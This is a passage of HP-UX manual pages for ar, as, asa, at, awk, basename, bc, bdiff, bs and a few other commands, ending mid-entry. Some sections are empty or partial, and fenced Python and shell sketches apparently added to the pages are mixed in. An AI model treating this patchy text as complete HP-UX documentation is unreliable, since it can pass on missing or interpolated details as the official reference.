WILL CALL AGAIN -
*****URGENT****** - very very!
FILES
$HOME/.elm/aliases User alias database data table
$HOME/.elm/aliases.dir User alias database directory table
AUTHOR
answer was developed by HP.
SEE ALSO
elm(1), newalias(1).
ar(1) ar(1)
NAME
ar - create and maintain portable archives and libraries
SYNOPSIS
ar [-]key [-][modifier ...] [posname ] afile [name ...]
DESCRIPTION
• If the u modifier is used with the operation character r, only those files with modification
dates later than those of the corresponding member files are replaced.
• ar creates afile if it does not already exist.
• If no name is specified and:
• the specified archive file does not exist, ar creates an empty archive file containing only
the archive header (see ar (4)).
• the archive contains one or more files whose names match names in the current direc-
tory, each matching archive file is replaced by the corresponding local file.
p Print the named files. If no names are specified, the contents of all files are printed in the
order that they appear in the archive.
m Move the named files. By default, the files are moved to the end of the archive. If a position-
ing modifier (a or b) is present, the files are moved before or after the positioning file posname.
x Extract the named files. If no names are given, all files in the archive are extracted. In nei-
ther case does x alter entries from the archive file.
The following list describes the optional modifier characters:
a Position the files after the existing positioning file specified by posname .
b Place the new files before the existing positioning file specified by posname .
c Suppress the message normally produced when afile is created. For r and q operations, ar
normally creates afile if it does not already exist.
z Do not rebuild the archive symbol table. This modifier is useful
only to avoid long build times when creating a large archive piece-by-piece. If an existing
archive contains a symbol table, the z modifier will cause it to be invalidated.
q: v, f, F, l, c, A, z, s
t: v, f, F, s
p: v, f, F, s
x: v, f, F, s, C, T
EXTERNAL INFLUENCES
Environment Variables
The following internationalization variables affect the execution of ar:
LANG
Determines the locale category for native language, local customs and coded character set in the
absence of LC_ALL and other LC_* environment variables. If LANG is not specified or is set to the
empty string, a default of "C" (see lang (5)) is used. If any internationalization variable contains an
invalid setting, ar behaves as if all internationalization variables are set to C. See environ (5).
In addition, the following environment variable affects ar:
TMPDIR
Specifies a directory for temporary files (see tmpnam (3S)). The l modifier overrides the TMPDIR
variable, and TMPDIR overrides /var/tmp, the default directory.
EXAMPLES
Create a new file (if one does not already exist) in archive format with its constituents entered in the
order indicated:
WARNINGS
FILES
/var/tmp/ar* Temporary files
SEE ALSO
STANDARDS CONFORMANCE
ar: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
as(1) as(1)
(Itanium(R)-based System Only)
NAME
as - assembler (Itanium Processor Family)
SYNOPSIS
as [ option ...] [ file ]
DESCRIPTION
as assembles the named source file file , or the standard input if file is not specified. The output of the
assembler is an ELF relocatable object file that must be processed by ld before it can be executed.
Assembler output is stored in file outfile . If the -o outfile option is not specified, the assembler constructs
a default name. If no source file is specified, outfile will be a.out; otherwise the .s suffix (if present) is
stripped from the name of the source file and .o is appended to it. Any directory names are removed
from the name so that the object file is always written to the current directory.
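The default output-name rule can be sketched as follows (the function name is an illustration, not part of as):

```python
import os

def default_outfile(source=None):
    """Default assembler output name: a.out when no source file is given;
    otherwise strip any directory part, drop a trailing .s, append .o."""
    if source is None:
        return "a.out"
    base = os.path.basename(source)   # object file goes to the current dir
    if base.endswith(".s"):
        base = base[:-2]
    return base + ".o"
```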
as does not perform any macro processing. Standard C preprocessor constructs can be used if the
assembler is invoked through the C compiler.
Options
as recognizes the following options.
+A32 Specify that the source file contains 32-bit ABI targeted code. This option is overridden by
the .psr abi64 assembler directive in the source file. The object file is a 32-bit ELF file
by default.
+A64 Specify that the source file contains 64-bit ABI targeted code. This option is overridden by
the .psr abi32 assembler directive in the source file. The object file is a 64-bit ELF file
by default.
+E32 Specify that the object file should be 32-bit ELF. This is the default (see also +A32). Note
that it is valid to write 64-bit ABI targeted code to a 32-bit ELF file. All 32-bit addresses in
the object file are zero-extended to 64-bit upon loading. Zero-extension, however, may
invalidate any negative addresses (such as with relocations).
-elf32 See +E32.
+E64 Specify that the object file should be 64-bit ELF (see also +A64).
-elf64 See +E64.
-o outfile Produce an output object file with the name outfile instead of constructing a default name.
EXTERNAL INFLUENCES
Environment Variables
NLSPATH determines the location of the message catalog for the processing of LC_MESSAGES.
SDKROOT controls which assembler to invoke and enables support for multiple (cross-) development kits.
The SDKROOT variable points to the root of a specific SDK. No provision has been made to validate the
value of the variable or the suitability of the assembler that’s being invoked.
WARNINGS
The assembler does not check dependencies.
DIAGNOSTICS
When syntactic or semantic errors occur, a single-line diagnostic is displayed on standard error, together
with the line number and the file name in which it occurred.
FILES
/usr/lib/nls/C/as.cat assembler error message catalog
a.out default assembler output file
SEE ALSO
cc(1), elf(3E), ld(1).
asa(1) asa(1)
NAME
asa - interpret ASA carriage control characters
SYNOPSIS
asa [files ]
DESCRIPTION
asa interprets the output of FORTRAN programs that utilize ASA carriage control characters. It
processes either the files whose names are given as arguments, or the standard input if - is specified or if
no file names are given. The first character of each line is assumed to be a control character. The follow-
ing control characters are interpreted as indicated:
(blank) Output a single new-line character before printing.
(space) (XPG4 only.) The rest of the line will be output without change.
0 Output two new-line characters before printing.
1 Output a new-page character before printing.
+ Overprint previous line.
+ (XPG4 only.) The <newline> of the previous line shall be replaced with one or more
implementation-defined characters that causes printing to return to column position 1, fol-
lowed by the rest of the input line. If the + is the first character in the input, it shall have
the same effect as <space>.
Lines beginning with other than the above characters are treated the same as lines beginning with a
blank. The first character of a line is not printed. If any such lines appear, an appropriate diagnostic is
sent to standard error. This program forces the first line of each input file to start on a new page.
(XPG4 only.) The action of the asa utility is unspecified upon encountering any character other than those
listed above as the first character in a line.
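The control-character handling above can be sketched as a small interpreter; this follows the classic (non-XPG4) behavior, treats unknown control characters as blank, and the function name is ours:

```python
def asa(lines):
    """Render ASA carriage control: blank -> one new-line before the text,
    '0' -> an extra blank line, '1' -> new page (form feed), '+' ->
    overprint the previous line via carriage return (a simplification)."""
    out = []
    for line in lines:
        cc, text = (line[0], line[1:]) if line else (" ", "")
        if cc == "+" and out:
            out[-1] += "\r" + text   # replace previous new-line with CR
        elif cc == "1":
            out.append("\f" + text)  # form feed starts a new page
        elif cc == "0":
            out.append("\n" + text)  # extra new-line: double spacing
        else:
            out.append(text)         # blank and anything else
    return "\n".join(out) + "\n" if out else ""
```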
To view the output of FORTRAN programs which use ASA carriage control characters and have them
appear in normal form, asa can be used as a filter:
a.out | asa | lp
The output, properly formatted and paginated, is then directed to the line printer. FORTRAN output
previously sent to a file can be viewed on a user terminal screen by using:
asa file

EXTERNAL INFLUENCES
Environment Variables
If any internationalization variable contains an invalid setting, asa behaves as if all internationalization
variables are set to "C". See environ (5).
SEE ALSO
efl(1), f77(1), fsplit(1), ratfor(1).
STANDARDS CONFORMANCE
asa: XPG4, POSIX.2
at(1) at(1)

NAME
at, batch - execute batched commands immediately or at a later time

SYNOPSIS
Enter commands from a file to run at a specified time:

at -f job-file [-m] [-q queue ] -t spectime
at -f job-file [-m] [-q queue ] time [date ] [next timeunit +count timeunit ]

DESCRIPTION
Commands can be entered in one of the following ways:
• From the keyboard on separate lines immediately after the at or batch command line, followed by
the currently defined eof (end-of-file) character to end the input. The default eof is Ctrl-D. It can be
redefined in your environment (see stty (1)).
• With the -f option of the at command to read input from a script file.
• From output piped from a preceding command.
EXTERNAL INFLUENCES
Environment Variables
LC_TIME determines the format and contents of date and time strings.
LC_MESSAGES determines the language in which messages are displayed.
LC_MESSAGES also determines the language in which the words days, hours, midnight, minutes,
months, next, noon, now, today, tomorrow, weeks, years, and their singular forms, can be
specified.
If these variables are not specified, all internationalization variables default
to "C" (see environ (5)).
RETURN VALUE
The exit code is set to one of the following:
WARNINGS
A trailing operator is silently ignored.
If you use both -t and time ... in the same command, the first specified is accepted and the second is
silently ignored.
If the FIFO used to communicate with cron fills up, at is suspended until cron has read sufficient mes-
sages
attributes(1) attributes(1)
NAME
attributes - describe an audio file
SYNOPSIS
/opt/audio/bin/attributes filename
DESCRIPTION
This command provides information about an audio file, including file format, data format, sampling rate,
number of channels, data length and header length.
EXAMPLE
The following is an example of using attributes on an audio file supplied with HP-UX.
$ /opt/audio/bin/attributes /opt/audio/sounds/welcome.au
File Name: /opt/audio/sounds/welcome.au
File Type: NeXT/Sun
Data Format: Mu-law
Sampling Rate: 22050
Channels: Mono
Duration: 1.972 seconds
Bits per Sample: 8
Header Length: 40 bytes
Data Length: 43492 bytes
AUTHOR
attributes was developed by HP.
Sun is a trademark of Sun MicroSystems, Inc.
NeXT is a trademark of NeXT Computers, Inc.
SEE ALSO
audio(5), asecure(1M), aserver(1M), convert(1), send_sound(1).
Using the Audio Developer’s Kit
awk(1)
NAME
awk - pattern-directed scanning and processing language
SYNOPSIS
awk [-F fs] [-v var=value] [ program | -f progfile ... ] [ file ... ]
DESCRIPTION
awk scans each input file for lines that match any of a set of patterns specified literally in program or in
one or more files specified as -f progfile . With each pattern there can be an associated action that is to
be performed when a line in a file matches the pattern. Each line is matched against the pattern portion
of every pattern-action statement, and the associated action is performed for each matched pattern. The
file name - means the standard input. Any file of the form var =value is treated as an assignment, not a
filename. An assignment is evaluated at the time it would have been opened if it were a filename, unless
the -v option is used.
An input line is made up of fields separated by white space, or by regular expression FS. The fields are
denoted $1, $2, ...; $0 refers to the entire line.
Options
awk recognizes the following options and arguments:
-F fs Specify regular expression used to separate fields. The default is to recognize space
and tab characters, and to discard leading spaces and tabs. If the -F option is
used, leading input field separators are no longer discarded.
-f progfile Specify an awk program file. Up to 100 program files can be specified. The
pattern-action statements in these files are executed in the same order as the files
were specified.
-v var =value Cause var =value assignment to occur before the BEGIN action (if it exists) is exe-
cuted.
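The options can be combined; as a small illustration (input and variable name are arbitrary), -F sets a colon field separator and -v seeds the variable n before the program runs:

```shell
# Print the n-th colon-separated field; n is assigned before execution begins.
echo 'a:b:c' | awk -F: -v n=2 '{ print $n }'
# prints: b
```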
Statements
A pattern-action statement has the form:
pattern { action }
A missing { action } means print the line; a missing pattern always matches. Pattern-action statements
are separated by newlines or semicolons. An action is a sequence of statements. A statement can be
one of the following:
if ( expression ) statement [ else statement ]
while ( expression ) statement
for ( expression ; expression ; expression ) statement
for ( var in array ) statement
do statement while ( expression )
break
continue
{ [ statement ... ] }
expression # commonly var = expression
print [ expression-list ] [ > expression ]
printf format [ , expression-list ] [ > expression ]
return [ expression ]
next # skip remaining patterns on this input line
delete array [ expression ] # delete an array element
exit [ expression ] # exit immediately; status is expression
Statements are terminated by semicolons, newlines or right braces. An empty expression-list stands for
$0. String constants are quoted (" "), with the usual C escapes recognized within. Expressions take on
string or numeric values as appropriate, and are built using the operators +, -, *, /, %, ˆ (exponentia-
tion), and concatenation (indicated by a blank). The operators ++, - -, +=, -=, *=, /=, %=, ˆ=, **=, >,
>=, <, <=, ==, !=, "" (double quotes, string conversion operator), and ?: are also available in expres-
sions. Variables can be scalars, array elements (denoted x [i ]) or fields. Variables are initialized to the
null string. Array subscripts can be any string, not necessarily numeric (this allows for a form of associa-
tive memory). Multiple subscripts such as [ i ,j ,k ] are permitted. The constituents are concatenated,
separated by the value of SUBSEP.
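A sketch of a multiple-subscript element (variable names are arbitrary): the element a[1,2] is stored under the single key "1" SUBSEP "2", which split can take apart again:

```shell
awk 'BEGIN {
    a[1,2] = "v"                        # stored under key "1" SUBSEP "2"
    for (k in a) {
        n = split(k, parts, SUBSEP)     # recover the constituent subscripts
        print n, parts[1], parts[2]
    }
}'
# prints: 2 1 2
```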
The print statement prints its arguments on the standard output (or on a file if >file or >>file is
present or on a pipe if |cmd is present), separated by the current output field separator, and terminated
by the output record separator. file and cmd can be literal names or parenthesized expressions. Identical
string values in different statements denote the same open file. The printf statement formats its
expression list according to the format (see printf (3)).
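For illustration (the file name is arbitrary), printf with a numeric format and print with a >file redirection:

```shell
# printf formats its arguments according to the format string.
awk 'BEGIN { printf "%.2f\n", 3.14159 }'
# prints: 3.14

# print > file sends output to the named file instead of standard output.
echo x | awk '{ print "logged" > "/tmp/awk-out.txt" }'
```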
Built-In Functions
The built-in function close(expr ) closes the file or pipe expr opened by a print or printf state-
ment or a call to getline with the same string-valued expr . This function returns zero if successful,
and nonzero otherwise.
Patterns
Patterns are arbitrary Boolean combinations (with ! || &&) of regular expressions and relational
expressions. awk supports Extended Regular Expressions as described in regexp (5). Isolated regular
expressions in a pattern apply to the entire line. Regular expressions can also occur in relational expres-
sions, using the operators ˜ and !˜. /re / is a constant regular expression; any string (constant or vari-
able) can be used as a regular expression, except in the position of an isolated regular expression in a pat-
tern.
A relational expression can use the matching operators ˜ (matches) or !˜ (does
not match). A conditional is an arithmetic expression, a relational expression, or a Boolean combination
of the two.
The special patterns BEGIN and END can be used to capture control before the first input line is read
and after the last. BEGIN and END do not combine with other patterns.
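For example, counting input lines uses only END, since NR holds the number of the last record once all input has been read:

```shell
# END runs after the last input line; NR is then the total line count.
printf 'a\nb\nc\n' | awk 'END { print NR }'
# prints: 3
```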
Special Characters
The following special escape sequences are recognized by awk in both regular expressions and strings:
Escape Meaning
\a alert character
\b backspace character
\f form-feed character
\n new-line character
\r carriage-return character
\t tab character
\v vertical-tab character
\nnn 1- to 3-digit octal value nnn
\xhhh 1- to n-digit hexadecimal number
Variable Names
Variable names with special meanings are:
FS Input field separator regular expression; a space character by default; also settable
by option -Ffs.
NF The number of fields in the current record.
NR The ordinal number of the current record from the start of input. Inside a
BEGIN action the value is zero. Inside an END action the value is the number of
the last record processed.
FNR The ordinal number of the current record in the current file. Inside a BEGIN
action the value is zero. Inside an END action the value is the number of the last
record processed in the last file processed.
FILENAME A pathname of the current input file.
RS The input record separator; a newline character by default.
OFS The print statement output field separator; a space character by default.
ORS The print statement output record separator; a newline character by default.
OFMT Output format for numbers (default %.6g). If the value of OFMT is not a
floating-point format specification, the results are unspecified.
CONVFMT Internal conversion format for numbers (default %.6g). If the value of
CONVFMT is not a floating-point format specification, the results are unspecified.
Refer to the UNIX95 variable under EXTERNAL INFLUENCES for additional
information on CONVFMT.
SUBSEP The subscript separator string for multi-dimensional arrays; the default value is
"\034"
ARGC The number of elements in the ARGV array.
ARGV An array of command line arguments, excluding options and the program argument,
numbered from zero to ARGC-1.
The arguments in ARGV can be modified or added to; ARGC can be altered. As
each input file ends, awk will treat the next non-null element of ARGV, up to the
current value of ARGC-1, inclusive, as the name of the next input file. Thus, set-
ting an element of ARGV to null means that it will not be treated as an input file.
The name - indicates the standard input. If an argument matches the format of
an assignment operand, this argument will be treated as an assignment rather
than a file argument.
ENVIRON Array of environment variables; subscripts are names. For example, if environ-
ment variable V=thing, ENVIRON["V"] produces thing.
RSTART The starting position of the string matched by the match function, numbering
from 1. This is always equivalent to the return value of the match function.
RLENGTH The length of the string matched by the match function.
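A small illustration (pattern and input are arbitrary): after a successful match call, RSTART and RLENGTH describe the matched substring:

```shell
# "bar" begins at position 4 of "foobar" and is 3 characters long.
echo 'foobar' | awk '{ if (match($0, "bar")) print RSTART, RLENGTH }'
# prints: 4 3
```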
Functions can be defined (at the position of a pattern-action statement) as follows:
function foo(a, b, c) { ...; return x }
Parameters are passed by value if scalar, and by reference if array name. Functions can be called recur-
sively. Parameters are local to the function; all other variables are global.
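A sketch of a user-defined function (names are arbitrary); the extra parameter t is listed only so that it is local to the function rather than global:

```shell
awk '
function add(a, b,    t) {
    t = a + b          # t is local because it appears in the parameter list
    return t
}
BEGIN { print add(2, 3) }'
# prints: 5
```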
Note that if pattern-action statements are used in an HP-UX command line as an argument to the awk
command, the pattern-action statement must be enclosed in single quotes to protect it from the shell. For
example, to print lines longer than 72 characters, the pattern-action statement as used in a script (-f
progfile command form) is:
length > 72
The same pattern action statement used as an argument to the awk command is quoted in this manner:
awk ’length > 72’
EXTERNAL INFLUENCES
Environment Variables
UNIX95 If defined, specifies to use the XPG4 behavior for this command. The changes for XPG4
include support for the entire behaviour specified above and include the following
behavioral change:
• If CONVFMT is not specified and UNIX95 is set, %d is used as the internal conversion
format for numbers by default.
LANG Provides a default value for the internationalization variables that are unset or null. If
LANG is unset or null, the default value of "C" (see lang (5)) is used. If any of the interna-
tionalization variables contains an invalid setting, awk will behave as if all internation-
alization variables are set to "C". See environ (5).
LC_ALL If set to a non-empty string value, overrides the values of all the other internationaliza-
tion variables.
LC_CTYPE Determines the interpretation of text as single and/or multi-byte characters, the
classification of characters as printable, and the characters matched by character class
expressions in regular expressions.
LC_NUMERIC Determines the radix character used when interpreting numeric input, performing
conversion between numeric and string values and formatting numeric output. Regard-
less of locale, the period character (the decimal-point character of the POSIX locale) is
the decimal-point character recognized in processing awk programs (including assign-
ments in command-line arguments).
LC_COLLATE Determines the locale for the behavior of ranges, equivalence classes and multi-character
collating elements within.
PATH Determines the search path when looking for commands executed by system(cmd), or
input and output pipes.
In addition, all environment variables will be visible via the awk variable ENVIRON.
DIAGNOSTICS
awk supports up to 199 fields ($1, $2, ..., $199) per record.
EXAMPLES
Print lines longer than 72 characters:
length > 72
Simulate the echo command (see echo (1)):
BEGIN { # Simulate echo(1)
for (i = 1; i < ARGC; i++) printf "%s ", ARGV[i]
printf "\n"
exit }
AUTHOR
awk was developed by AT&T, IBM, OSF, and HP.
SEE ALSO
lex(1), sed(1).
A. V. Aho, B. W. Kernighan, P. J. Weinberger: The AWK Programming Language , Addison-Wesley, 1988.
STANDARDS CONFORMANCE
awk: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
banner(1)
NAME
banner - make posters in large letters
SYNOPSIS
banner strings
DESCRIPTION
banner prints its arguments (each up to 10 characters long) in large letters on the standard output.
Each argument is printed on a separate line. Note that multiple-word arguments must be enclosed in
quotes in order to be printed on the same line.
EXAMPLES
Print the message ‘‘Good luck Susan’’ in large letters on the screen:
banner "Good luck" Susan
The words Good luck are displayed on one line, and Susan is displayed on a second line.
WARNINGS
This command is likely to be withdrawn from X/Open standards. Applications using this command might
not be portable to other vendors’ platforms.
SEE ALSO
echo(1).
STANDARDS CONFORMANCE
banner: SVID2, SVID3, XPG2, XPG3
basename(1)
NAME
basename, dirname - extract portions of path names
SYNOPSIS
basename string [ suffix ]
dirname [ string ]
DESCRIPTION
basename deletes any prefix ending in / and the suffix (if present in string ) from string , and prints the
result on the standard output. If string consists entirely of slash characters, string is set to a single slash
character. If there are any trailing slash characters in string , they are removed. If the suffix operand is
present but not identical to the characters remaining in string , but it is identical to a suffix of the characters
remaining in string , the suffix is removed from string . basename is normally used inside com-
mand substitution marks ( `... ` ) within shell procedures.
dirname delivers all but the last level of the path name in string . If string does not contain a directory
component, dirname returns ., indicating the current working directory.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of string and, in the case of basename, suffix, as single-
and/or multi-byte characters. If any internationalization variable contains an invalid setting,
basename and dirname behave as if all internationalization variables are set to "C".
See environ (5).
EXAMPLES
The following shell script, invoked with the argument /usr/src/cmd/cat.c, compiles the named file
and moves the output to a file named cat in the current directory:
cc $1
mv a.out ‘basename $1 .c‘
The following example sets the shell variable NAME to /usr/src/cmd:
NAME=‘dirname /usr/src/cmd/cat.c‘
RETURNS
basename and dirname return one of the following values:
0 Successful completion.
1 Incorrect number of command-line arguments.
SEE ALSO
expr(1), sh(1).
STANDARDS CONFORMANCE
basename: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
dirname: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
bc(1)
NAME
bc - arbitrary-precision arithmetic language
SYNOPSIS
bc [-c] [-l] [ file ... ]
DESCRIPTION
bc is an interactive processor for a language that resembles C but provides unlimited-precision arith-
metic. It takes input from any files given, then reads the standard input.
Options:
bc recognizes the following command-line options:
-c Compile only. bc is actually a preprocessor for dc which bc invokes automatically
(see dc(1)). Specifying -c prevents invoking dc, and sends the dc input to standard out-
put.
-l Causes an arbitrary-precision math library to be predefined. As a side effect, the scale
factor is set to 20.
Program Syntax:
L a single letter in the range a through z;
E expression;
S statement;
R relational expression.
Names:
Names include:
simple variables: L
array elements: L [ E ]
The words ibase, obase, and scale
stacks: L
Other Operands
Other operands include:
Arbitrarily long numbers with optional sign and decimal point.
(E)
sqrt ( E )
length ( E ) number of significant decimal digits
scale ( E ) number of digits right of decimal point
L ( E , ... , E )
Strings of ASCII characters enclosed in quotes ( " ).
Arithmetic Operators:
Arithmetic operators yield an E as a result and include:
+ - * / % ˆ ( % is remainder (not mod, see below); ˆ is power).
++ -- (prefix and postfix; apply to names)
= += -= *= /= %= ˆ=
Relational Operators
Relational operators yield an R when used as E op E:
== <= >= != < >
Statements
E
{ S ; ... ; S }
if ( R ) S
while ( R ) S
for ( E ; R ; E ) S
null statement
break
quit
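For illustration, a short session piped from the shell (assuming bc is installed); scale sets the number of digits kept after the decimal point:

```shell
# With scale = 4, division keeps four digits after the decimal point.
echo 'scale = 4; 10 / 3' | bc
# prints: 3.3333
```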
Function Definitions:
define L ( L ,..., L ) {
auto L, ... , L
S; ... S
return ( E )
}
EXAMPLES
Define a function to compute an approximate value of the exponential function:
scale = 20
define e(x) {
auto a, b, c, i, s
a = 1
b = 1
s = 1
for (i = 1; 1 == 1; i++) {
a = a*x
b = b*i
c = a/b
if (c == 0) return(s)
s = s + c
}
}
Print approximate values of the exponential function of the first ten integers:
for (i = 1; i <= 10; i++) e(i)
WARNINGS
There are currently no && (AND) or || (OR) comparisons.
The for statement must have all three expressions.
quit is interpreted when read, not when executed.
bc’s parser is not robust in the face of input errors. Some simple expression such as 2+2 helps get it back
into phase.
The assignment operators: =+ =- =* =/ =% and =ˆ are obsolete. Any occurrences of these
operators cause a syntax error with the exception of =- which is interpreted as = followed by a unary
minus.
Neither entire arrays nor functions can be passed as function parameters.
FILES
/usr/bin/dc desk calculator executable program
/usr/lib/lib.b mathematical library
SEE ALSO
bs(1), dc(1).
bc tutorial in Number Processing Users Guide
STANDARDS CONFORMANCE
bc: XPG4, POSIX.2
bdiff(1)
NAME
bdiff - diff for large files
SYNOPSIS
bdiff file1 file2 [ n ] [-s]
DESCRIPTION
bdiff compares two files and produces output identical to what would be produced by diff (see
diff(1)), specifying changes that must be made to make the files identical. bdiff is designed for han-
dling files that are too large for diff, but it can be used on files of any length.
bdiff processes files as follows:
• Ignore lines common to the beginning of both files.
• Split the remainder of each file into n-line segments, then execute diff on corresponding seg-
ments. The default value of n is 3500.
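Since bdiff's output is identical to diff's, the output format can be illustrated with diff itself (file names and contents are arbitrary):

```shell
printf 'a\nb\nc\n' > /tmp/f1
printf 'a\nx\nc\n' > /tmp/f2
diff /tmp/f1 /tmp/f2 || true    # diff exits nonzero when the files differ
```

This prints a change block of the form "2c2", the old line prefixed with "<", a "---" separator, and the new line prefixed with ">".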
Command-Line Arguments
bdiff recognizes the following command-line arguments:
file1
file2 Names of two files to be compared by bdiff. If file1 or file2 (but not both) is -, stan-
dard input is used instead.
n If a numeric value is present as the third argument, the files are divided into n-line
segments before processing by diff. Default value for n is 3500. This option is useful
when 3500-line segments are too large for processing by diff.
-s Silent option suppresses diagnostic printing by bdiff, but does not suppress possible
error messages from diff. If the n and -s arguments are both used, the n argument
must precede the -s option on the command line or it will not be properly recognized.
EXTERNAL INFLUENCES
Environment Variables
If any internationalization variable contains an invalid setting, bdiff behaves as if all internationaliza-
tion variables are set to "C". See environ (5).
DIAGNOSTICS
both files standard input (bd2)
Standard input was specified for both files. Only one file can be specified as standard input.
non-numeric limit (bd4)
A non-numeric value was specified for the n (third) argument.
EXAMPLES
Find differences between two large files: file1 and file2, and place the result in a new file named
diffs_1.2.
bdiff file1 file2 >diffs_1.2
Do the same, but limit file length to 1400 lines; suppress error messages:
bdiff file1 file2 1400 -s >diffs_1.2
WARNINGS
bdiff produces output identical to output from diff, and makes the necessary line-number corrections
so that the output looks like it was processed by diff. However, depending on where the files are split,
bdiff may or may not find a fully minimized set of file differences.
FILES
/tmp/bd??????
SEE ALSO
diff(1).
bs(1)
NAME
bs - a compiler/interpreter for modest-sized programs
SYNOPSIS
bs [ file [ args ] ]
DESCRIPTION
bs is a remote descendant of BASIC and SNOBOL4 with some C language added. bs is designed for pro-
gramming tasks where program development time is as important as the resulting speed of execution.
Formalities of data declaration and file/process manipulation are minimized. Line-at-a-time debugging,
the trace and dump statements, and useful run-time error messages all simplify program testing.
Furthermore, incomplete programs can be debugged; inner functions can be tested before outer functions
have been written, and vice versa.
If file is specified on the command-line, it is used for input before any input is taken from the keyboard.
By default, statements read from file are compiled for later execution. Likewise, statements entered from
the keyboard are normally executed immediately (see compile and execute below). Unless the final
operation is assignment, the result of an immediate expression statement is printed.
bs programs are made up of input lines. If the last character on a line is a \, the line is continued. bs
accepts lines of the following form:
statement
label statement
A label is a name (see below) followed by a colon. A label and a variable can have the same name.
A bs statement is either an expression or a keyword followed by zero or more expressions. Some key-
words (clear, compile, !, execute, include, ibase, obase, and run) are always executed as
they are compiled.
Statement Syntax:
expression The expression is executed for its side effects (value, assignment, or function call). The
details of expressions follow the description of statement types below.
break break exits from the innermost for/while loop.
clear Clears the symbol table and compiled statements. clear is executed immediately.
compile [expression]
Succeeding statements are compiled (overrides the immediate execution default). The
optional expression is evaluated and used as a file name for further input. A clear is
associated with this latter case. compile is executed immediately.
continue continue transfers to the loop-continuation of the current for/while loop.
dump [name] The name and current value of every non-local variable is printed. Optionally, only the
named variable is reported. After an error or interrupt, the number of the last statement
is displayed. The user-function trace is displayed after an error or stop that occurred
in a function.
edit A call is made to the editor selected by the EDITOR environment variable if it is present,
or ed(1) if EDITOR is undefined or null. If the file argument is present on the command
line, file is passed to the editor as the file to edit (otherwise no file name is used). Upon
exiting the editor, a compile statement (and associated clear) is executed giving that
file name as its argument.
exit [expression]
Return to system level. The expression is returned as process status.
execute Change to immediate execution mode (an interrupt has a similar effect). This statement
does not cause stored statements to execute (see run below).
Expression Syntax:
name A name is used to specify a variable. Names are composed of a letter (uppercase or
lowercase) optionally followed by letters and digits. Only the first six characters of a
name are significant. Except for names declared in fun statements, all names are global
to the program. Names can take on numeric (double float) values, string values, or can
be associated with input/output (see the built-in function open( ) below).
name ( [expression [ , expression] ... ] )
Functions can be called by a name followed by the arguments in parentheses separated
by commas. Except for built-in functions (listed below), the name must be defined with a
fun statement. Arguments to functions are passed by value. If the function is undefined,
the call history to the call of that function is printed, and a request for a return value (as
an expression) is made. The result of that expression is taken to be the result of the
undefined function. This permits debugging programs where not all the functions are yet
defined. The value is read from the current input file.
name [ expression [ , expression ] ... ]
This syntax is used to reference either arrays or tables (see built-in table functions
below). For arrays, each expression is truncated to an integer and used as a specifier for
the name. The resulting array reference is syntactically identical to a name; a[1,2] is
the same as a[1][2]. The truncated expressions are restricted to values between 0 and
32 767.
number A number is used to represent a constant value. A number is written in Fortran style,
and contains digits, an optional decimal point, and possibly a scale factor consisting of an
e followed by a possibly signed exponent.
string Character strings are delimited by " characters. The \ escape character allows the dou-
ble quote (\"), new-line (\n), carriage return (\r), backspace (\b), and tab (\t) charac-
ters to appear in a string. Otherwise, \ stands for itself.
( expression ) Parentheses are used to alter the normal order of evaluation.
( expression , expression [ , expression ... ] ) [ expression ]
The bracketed expression is used as a subscript to select a comma-separated expression
from the parenthesized list. List elements are numbered from the left, starting at zero.
The expression:
( False, True )[ a == b ]
has the value True if the comparison is true.
? expression The interrogation operator tests for the success of the expression rather than its value.
At the moment, it is useful for testing end-of-file (see examples in the Programming Tips
section below), the result of the eval built-in function, and for checking the return from
user-written functions (see freturn). An interrogation ‘‘trap’’ (end-of-file, etc.) causes
an immediate transfer to the most recent interrogation, possibly skipping assignment
statements or intervening function levels.
- expression The result is the negation of the expression.
++ name Increments the value of the variable (or array reference). The result is the new value.
- - name Decrements the value of the variable. The result is the new value.
!expression The logical negation of the expression. Watch out for the shell escape command.
expression operator expression Common functions of two arguments are abbreviated by the two
arguments separated by an operator denoting the function. Except for the assignment,
concatenation, and relational operators, both operands are converted to numeric form
before the function is applied.
Built-in Functions:
Dealing with arguments
arg(i ) is the value of the i-th actual parameter on the current level of function call. At level
zero, arg returns the i-th command-line argument (arg(0) returns bs).
narg( ) returns the number of arguments passed. At level zero, the command argument count is
returned.
Mathematical
abs(x ) is the absolute value of x.
atan(x ) is the arctangent of x. Its value is between −π/2 and π/2.
ceil(x ) returns the smallest integer not less than x.
cos(x ) is the cosine of x (radians).
exp(x ) is the exponential function of x.
floor(x ) returns the largest integer not greater than x.
log(x ) is the natural logarithm of x.
rand( ) is a uniformly distributed random number between zero and one.
sin(x ) is the sine of x (radians).
sqrt(x ) is the square root of x.
String operations
size(s ) the size (length in bytes) of s is returned.
format(f , a )
returns the formatted value of a. f is assumed to be a format specification in the style of
printf (3S). Only the % ... f, % ... e, and % ... s types are safe. Since it is not
always possible to know whether a is a number or a string when the format call is
coded, coercing a to the type required by f by either adding zero (for e or f format) or
concatenating (_) the null string (for s format) should be considered.
index(x , y ) returns the number of the first position in x that any of the characters from y matches.
No match yields zero.
trans(s , f, t )
Translates characters of the source s from matching characters in f to a character in the
same position in t . Source characters that do not appear in f are copied to the result. If
the string f is longer than t , source characters that match in the excess portion of f do not
appear in the result.
substr(s , start, width )
returns the sub-string of s defined by the start ing position and width .
match(string , pattern )
mstring(n ) The pattern is a regular expression according to the Basic Regular Expression definition
(see regexp (5)). mstring returns the n-th (1 <= n <= 10) substring of the subject that
occurred between pairs of the pattern symbols \( and \) for the most recent call to
match . To succeed, patterns must match the beginning of the string (as if all patterns
began with ˆ). The function returns the number of characters matched. For example:
match("a123ab123", ".*\([a-z]\)") == 6
mstring(1) == "b"
File handling
open(name , file, function )
close(name )
name argument must be a bs variable name (passed as a string). For the open, the file
argument can be:
1. a 0 (zero), 1, or 2 representing standard input, output, or error output, respec-
tively;
2. a string representing a file name; or
3. a string beginning with an ! representing a command to be executed (via sh
-c). The function argument must be either r (read), w (write), W (write
without new-line), or a (append). After a close, name reverts to being an
ordinary variable. If name was a pipe, a wait() is executed before the close
completes (see wait (2)). The bs exit command does not do such a wait. The
initial associations are:
open("get", 0, "r")
open("put", 1, "w")
open("puterr", 2, "w")
Examples are given in the following section.
access(s , m )
executes access() (see access (2)).
ftype(s ) returns a single character file type indication: f for regular file, p for FIFO (i.e., named
